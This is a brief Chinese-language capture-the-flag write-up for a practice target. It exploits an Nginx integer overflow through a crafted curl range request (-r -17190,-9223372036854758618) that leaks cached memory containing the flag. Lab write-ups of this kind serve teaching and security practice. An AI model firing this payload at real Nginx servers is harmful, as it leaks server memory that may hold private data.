靶场地址:http://www.whalwl.site:8040/
解题准备:了解Nginx整数溢出漏洞的利用方法
解题思路:
1、根据首页提示,手动访问
http://www.whalwl.site:8040/proxy/demo.png
2、发现图片存在,于是根据提示构造poyload
curl -i http://www.whalwl.site:8040/proxy/demo.png -r -17190,-9223372036854758618 > poc.txt
3、 打开自己主机的命令行,执行后在桌面生成poc.txt,用notepad++打开即可发现flag